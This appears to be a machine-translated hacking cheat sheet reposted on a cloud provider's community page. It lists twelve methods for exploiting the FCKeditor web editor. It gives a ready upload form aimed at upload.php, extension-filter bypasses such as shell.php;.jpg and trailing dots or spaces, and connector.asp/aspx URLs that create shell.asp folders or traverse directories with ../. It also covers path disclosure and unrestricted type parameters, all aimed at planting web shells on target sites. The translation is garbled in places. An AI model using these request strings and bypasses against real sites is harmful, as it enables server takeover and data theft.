FCKeditor Exploit Method Summary _ script intrusion

Source: Internet
Author: User
Tags php and


1. View Editor Version
Fckeditor/_whatsnew.html
——————————————————————————————————————



2. Version 2.2
Apache+linux environment in the upload file after the add a. Breakthrough. Test passed.
——————————————————————————————————————



3.Version <=2.4.2 for PHP does not control the type of media uploaded in the processing of PHP uploads, causing the user to upload arbitrary files. Save the following as an HTML file and modify the action address.
<form id= "Frmupload" enctype= "Multipart/form-data"
Action= "http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?" Type=media "method=" POST ">upload a new file:<br>
<input type= "File" Name= "NewFile" size= "50″><br>
<input id= "Btnupload" type= "Submit" value= "Upload" >
</form>
——————————————————————————————————————



4.FCKeditor file Upload "." Bypass method to change "_" Underline
Many times uploaded files such as: Shell.php.rar or shell.php;. JPG will become shell_php; JPG This is the change of the new FCK.
4.1: Commit shell.php+ Space Bypass
However, the space only supports win system *nix is not supported [shell.php and shell.php+ spaces are 2 different files not tested.
4.2: Continue uploading files with the same name can be changed to shell.php (1). jpg can also create a new folder, only detect the first level of the directory, if the jump to the level two directory is not restricted.
——————————————————————————————————————



5. Break through to create a folder
Fckeditor/editor/filemanager/connectors/asp/connector.asp? command=createfolder&type=image&currentfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? Command=createfolder&currentfolder=/&type=image&newfoldername=shell.asp
——————————————————————————————————————



6. FCKeditor The upload address of the test file
fckeditor/editor/filemanager/browser/default/connectors/test.html
fckeditor/ editor/filemanager/upload/test.html
fckeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/ filemanager/connectors/uploadtest.html
——————————————————————————————————————



7. Common upload address
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? command=getfoldersandfiles&type=image&currentfolder=/
fckeditor/editor/filemanager/browser/default/ Browser.html?type=image&connector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/ Default/browser.html? type=image&connector=http://www.site.com%2ffckeditor%2feditor%2ffilemanager%2fconnectors%2fphp% 2fconnector.php (ver:2.6.3 test passed)
JSP version:
fckeditor/editor/filemanager/browser/default/browser.html? type=image&connector=connectors/jsp/connector.jsp
Note that the Red section is modified to fckeditor the script language that is actually used, and the blue section can be customized
folder name can also be used ... /.. Directory traversal, the purple part is the actual website address.
——————————————————————————————————————



8. Other Upload Address
Fckeditor/_samples/default.html
Fckeditor/_samples/asp/sample01.asp
Fckeditor/_samples/asp/sample02.asp
Fckeditor/_samples/asp/sample03.asp
Fckeditor/_samples/asp/sample04.asp
Generally many sites have been deleted _samples directory, you can try.
Fckeditor/editor/fckeditor.html can not upload files, you can click the Upload Picture button and then select Browse Server can jump to upload file page.
——————————————————————————————————————



9. Column directory vulnerabilities can also help find the upload address
Version 2.4.1 Test Passed
Modify CurrentFolder parameter use ... /.. /To enter a different directory
/browser/default/connectors/aspx/connector.aspx? Command=createfolder&type=image&currentfolder=.. /.. /.. %2f&newfoldername=shell.asp
Depending on the XML information returned, you can view all the directories in the Web site.
Fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx? command=getfoldersandfiles&type=image&currentfolder=%2f
You can also browse the letter directly:
JSP version:
Fckeditor/editor/filemanager/browser/default/connectors/jsp/connector? command=getfoldersandfiles&type=&currentfolder=%2f
——————————————————————————————————————



10. Explosion Path Vulnerability
Fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx? Command=getfoldersandfiles&type=file&currentfolder=/shell.asp
——————————————————————————————————————



11. FCKeditor the problem of lax filtering caused by passive restriction strategy
Impact version: FCKeditor x.x <= FCKeditor v2.4.3
Vulnerability Description:
The file category in FCKeditor v2.4.3 rejects the upload type by default:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi| Htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 allows files that are uploaded ASA, CER, PHP2, PhP4, Inc, PWML, PHT suffix file to be directly used $sfilepath = $sServerDir. $sFileName, instead of using $sextension as the suffix. Directly resulting in win under the upload file after the add a. To break through [not tested]!
In Apache, because the "Apache file name resolution flaw vulnerability" can also be used, and other suggestions for the other upload vulnerability in the definition of type variables to use the file category to upload files, according to FCKeditor code, the restrictions of the most narrow.
It is good to meet a direct upload script file when uploading, but some versions may not be able to upload directly to the file after the filename plus the. dot or space bypass, you can also use 2003 parsing vulnerabilities to establish xxx.asp folder or upload xx.asp; Jpg!
——————————————————————————————————————



12. The oldest vulnerability, the type file has no limits.
The first FCKeditor vulnerability I've come into contact with. The version is unknown, it should be very old, because the program does not check the type of type=xxx. We can directly construct the upload to change the type=image to Type=hsren so we can create a folder called Hsren, a new type, without any restrictions, can upload arbitrary script.


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.